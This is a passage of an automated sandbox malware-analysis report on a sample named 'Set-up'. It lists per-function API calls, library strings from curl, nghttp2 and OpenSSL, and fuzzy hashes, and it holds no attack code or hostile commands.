Instruction Fuzzy Hash: 1931A272500241AFD7119F54EC09FDA3BFABF85319F0904B8E8049B1A3EB32E528C761

Function 000CA090 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(C2E85040,-0000000F,00000000,?,?,?,?,000C70DF,00000001,?,?,?), ref: 000CA0E5

Part of subcall function 000CA140: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?), ref: 000CA29A

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ksl->head,nghttp3_ksl.c,00000218,?,?,?,?,000C70DF,00000001,?,?,?), ref: 000CA135

Strings

ksl->head, xrefs: 000CA130
nghttp3_ksl.c, xrefs: 000CA12B

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _assertmemcpymemmove
String ID: ksl->head$nghttp3_ksl.c
API String ID: 374949274-2784241221
Opcode ID: f56105ce0e485dd6d654b9c2202a4c8ba238d1466fecdab59bdaa1f894dfe138
Instruction ID: 79b41e6c7e6b6ee7dba80131f9631e4b2b7c4149127d97ebc4fef77f0a06824b
Opcode Fuzzy Hash: f56105ce0e485dd6d654b9c2202a4c8ba238d1466fecdab59bdaa1f894dfe138
Instruction Fuzzy Hash: AB113D703002059FDB149F14D985EAEFBA6FB86319F1CD65DE9498B642D334EC41CB92

Function 000BE0D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?), ref: 000BE148
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp2_buf_avail(buf) >= padlen - 1,nghttp2_frame.c,000004B6,?,?,?,?,000B2615,?,?,?,?), ref: 000BE16E

Strings

nghttp2_frame.c, xrefs: 000BE164
nghttp2_buf_avail(buf) >= padlen - 1, xrefs: 000BE169

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _assertmemset
String ID: nghttp2_buf_avail(buf) >= padlen - 1$nghttp2_frame.c
API String ID: 1036001119-2332821266
Opcode ID: c245e346fb42b5f91eb952d89abaa3fc816ff5e19cae038bf77ab771b05283ce
Instruction ID: b8042e7677d06da44fbda6ebd980267f81ebfce71c836d54db906ab115ddba19
Opcode Fuzzy Hash: c245e346fb42b5f91eb952d89abaa3fc816ff5e19cae038bf77ab771b05283ce
Instruction Fuzzy Hash: 0F11EE71A00B8AAFC300CF24D844E85FBA5FF95325F04C659E8580B712D731E928CBA0

Function 0004C5F0 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 275COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 0004C685

Part of subcall function 000273F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,#HttpOnly_,?,0002CA95,0059DE58,00000467,mprintf.c), ref: 0002741D
Part of subcall function 000273F0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,00000001), ref: 00027445

Part of subcall function 000273F0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,0002CA95,0059DE58,00000467,mprintf.c), ref: 00027486
Part of subcall function 000273F0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000274AA
Part of subcall function 000273F0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000274B2

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 0004C6CF
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 0004C719

Strings

vtls/vtls.c, xrefs: 0004C653, 0004C69D, 0004C6E7, 0004C72E, 0004C756, 0004C77F, 0004C7A8, 0004C7D1, 0004C7FA, 0004C823, 0004C84C, 0004C875, 0004C935, 0004C95F

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: memcpy$__acrt_iob_func_errnofflushstrlen
String ID: vtls/vtls.c
API String ID: 1294796744-169717415
Opcode ID: 6a2217757292f599f33cdcbca8a05c824cd3506372af60a2e5bfc76cbea1e995
Instruction ID: 3022cd549501394eed8ed7827cc771631e4b56c056c1ebe2dc03c0404dab02ca
Opcode Fuzzy Hash: 6a2217757292f599f33cdcbca8a05c824cd3506372af60a2e5bfc76cbea1e995
Instruction Fuzzy Hash: 7BA141B0B02B02ABE7A08F65D845F12BBE8FF55744F08453DE948DB682FB71E9508B54

Function 001AE720 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 207COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000000), ref: 001AE9A3

Strings

, xrefs: 001AE992
BN_lshift, xrefs: 001AE7E2
crypto/bn/bn_shift.c, xrefs: 001AE7E9

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: memset
String ID: $BN_lshift$crypto/bn/bn_shift.c
API String ID: 2221118986-2228461501
Opcode ID: a5014677e8962e66802220eb46bc86e6b78f25d739ee9243cc5c7e9daabb3019
Instruction ID: 69e6560eb7c3dcee2059166e4d23332685c70a5dcad15e778d92faeecb7cbd34
Opcode Fuzzy Hash: a5014677e8962e66802220eb46bc86e6b78f25d739ee9243cc5c7e9daabb3019
Instruction Fuzzy Hash: 0971FE75A087119BC729DF29C88062AF7E5AFDA310F058B2EFDA967391D770AC01CB41

Function 00224870 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 179stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,001D05BF,00000000,00000000,input), ref: 00224986
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,?), ref: 002249D4

Strings

crypto/property/property_string.c, xrefs: 00224926, 00224959, 0022499A, 002249F3, 00224A4D, 00224A72
ossl_property_string, xrefs: 0022491C, 0022494F

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: memcpystrlen
String ID: crypto/property/property_string.c$ossl_property_string
API String ID: 3412268980-3682758481
Opcode ID: ed97972b58452dcc73235373a074482aa3ba71e0b120b67e9864c0c09e87b878
Instruction ID: 1bcecb0458e5a9d468b53945f5936926f8d32cce108d24caf06b1d4fbda44457
Opcode Fuzzy Hash: ed97972b58452dcc73235373a074482aa3ba71e0b120b67e9864c0c09e87b878
Instruction Fuzzy Hash: 105104B6D547257BE711BAA4BC03F6B76989F14304F080034FD4896293FBA2E970C792

Function 00216590 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 160COMMON

Download Yara Rule

APIs

memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0021662C

Part of subcall function 001D7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D7262
Part of subcall function 001D7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D7285
Part of subcall function 001D7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D72C5
Part of subcall function 001D7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D72E8

Strings

ocsp_match_issuerid, xrefs: 002166A9, 002166E3, 0021675D
crypto/ocsp/ocsp_vfy.c, xrefs: 002166B3, 002166ED, 00216767

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strcpystrlen$memcmp
String ID: crypto/ocsp/ocsp_vfy.c$ocsp_match_issuerid
API String ID: 1653033214-3047229099
Opcode ID: feccdb1aa4b5fefbdcd56ec67ef2fe6c72197dad9987ef6c25f14bbe415b151c
Instruction ID: 4f8f3e81c55ff3442685842aa3fb82de20ac161c8579827e3ee3ba7b63e6906a
Opcode Fuzzy Hash: feccdb1aa4b5fefbdcd56ec67ef2fe6c72197dad9987ef6c25f14bbe415b151c
Instruction Fuzzy Hash: AC4107A5E5431276E6103A702C8BF9F32898F75748F140535FE09992C3FAA5DA7482A7

Function 000A8130 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 119COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000010,?,?,?,?,?,?,005A8D61,?), ref: 000A81A3
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?,?,?,?,?,?,?,?,005A8D61,?), ref: 000A81BD
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 000A822A

Strings

dynhds.c, xrefs: 000A817B, 000A81FE, 000A8232, 000A8265

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: memcpy
String ID: dynhds.c
API String ID: 3510742995-4001380837
Opcode ID: 6d0c3c7a7c46a54bd7e195e4a129e16580b625b764df8034f0c80f5b8174f7e7
Instruction ID: e9e59039cd162fe845ce31b62096c3abd427cb55971021b7609192a35616b69d
Opcode Fuzzy Hash: 6d0c3c7a7c46a54bd7e195e4a129e16580b625b764df8034f0c80f5b8174f7e7
Instruction Fuzzy Hash: 64416E71A04205AFDB18DF54D881B67BBA8EF95704F04C96DF9498B246EB30E914CB61

Function 000E8710 Relevance: 6.1, APIs: 4, Instructions: 114COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 000E8769
SleepConditionVariableCS.KERNEL32(?,?,000000FF), ref: 000E87D1

Part of subcall function 000E88B0: QueryPerformanceFrequency.KERNEL32(?), ref: 000E88C1
Part of subcall function 000E88B0: QueryPerformanceCounter.KERNEL32(?), ref: 000E88CC

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: PerformanceQuery$ConditionCounterCriticalEnterFrequencySectionSleepVariable
String ID:
API String ID: 3112449238-0
Opcode ID: 88cbabb22292ebe5edf68819a2055ad6f8e28d319944c8969f22dedf33f801f5
Instruction ID: e7c0e5f690ebddafef357b08bd45a0ba177be87ed415ad1e46f96a24e4ad5ee9
Opcode Fuzzy Hash: 88cbabb22292ebe5edf68819a2055ad6f8e28d319944c8969f22dedf33f801f5
Instruction Fuzzy Hash: 26311A72B04281AFE7449A36DD45B6B77A9BB80300F14853CEC59E7191EF31ED14C791

Function 001D60E0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 107COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(001D7CCC,?,00000000,001D7127,001D7CCC,00000000,001FCAB7,00021A70), ref: 001D60E3
SetLastError.KERNEL32(00000000), ref: 001D61A5

Strings

crypto/err/err.c, xrefs: 001D6275
crypto/err/err_local.h, xrefs: 001D620C, 001D6227, 001D6257

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: ErrorLast
String ID: crypto/err/err.c$crypto/err/err_local.h
API String ID: 1452528299-2963546075
Opcode ID: f75a2a82b1fb2b4e5409dac7690b0d7154817ed56b4cbca5ae01f30d3190b4d4
Instruction ID: 5999544d727df220d088c09d9317f32cb270bf6a801b27bdc125162ad637aaa2
Opcode Fuzzy Hash: f75a2a82b1fb2b4e5409dac7690b0d7154817ed56b4cbca5ae01f30d3190b4d4
Instruction Fuzzy Hash: 083145B5680306BAF7216F28AC47B763350BB8074DF440322FE14643D7E7B6A834CA91

Function 00050639 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00050646

Part of subcall function 0010F340: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,000500B0,?,?,00000000,00000000,?), ref: 0010F35D

Strings

Unknown error in libssh2, xrefs: 000506EE, 000506FF
vssh/libssh2.c, xrefs: 000506A7, 000506C9
Attempt to set SFTP stats failed: %s, xrefs: 00050700

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _time64strlen
String ID: Attempt to set SFTP stats failed: %s$Unknown error in libssh2$vssh/libssh2.c
API String ID: 3014104814-2439779272
Opcode ID: 3147a8474f21f4c2515416fdb9a4f01233a741ebaacecb2bea75442f88c7d99f
Instruction ID: a4cc95443ce1f8ab41454df32d653009267e67ee335411ec0a8988071329f28b
Opcode Fuzzy Hash: 3147a8474f21f4c2515416fdb9a4f01233a741ebaacecb2bea75442f88c7d99f
Instruction Fuzzy Hash: 4031F5B5A08601AFD7119F18D841B9EF7E4BF89324F044578F85C4B392E370BA28CB92

Function 00050584 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 73stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00050594

Part of subcall function 0010EE30: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 0010EE4F

Strings

mkdir command failed: %s, xrefs: 0005062F
Unknown error in libssh2, xrefs: 0005061D
vssh/libssh2.c, xrefs: 000505F8

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _time64strlen
String ID: Unknown error in libssh2$mkdir command failed: %s$vssh/libssh2.c
API String ID: 3014104814-3060469362
Opcode ID: da9df92baa293b29fea8d8817ce57984ccb59796bbaa44467dff9d43b8b9acb3
Instruction ID: af48bb73510017321a1c791c1a26c36b704bb17fae9be373ab33abdad7ad63db
Opcode Fuzzy Hash: da9df92baa293b29fea8d8817ce57984ccb59796bbaa44467dff9d43b8b9acb3
Instruction Fuzzy Hash: 1021B4B5A04601AFD7119F68D881A9AF7E4BF49324F048578F95C8B352E370AD18CB92

Function 00194460 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 70stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,001971DD,00000000,?,?), ref: 001944AC
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000,?,?,?,?,?), ref: 001944FF

Part of subcall function 001D7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D7262
Part of subcall function 001D7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D7285
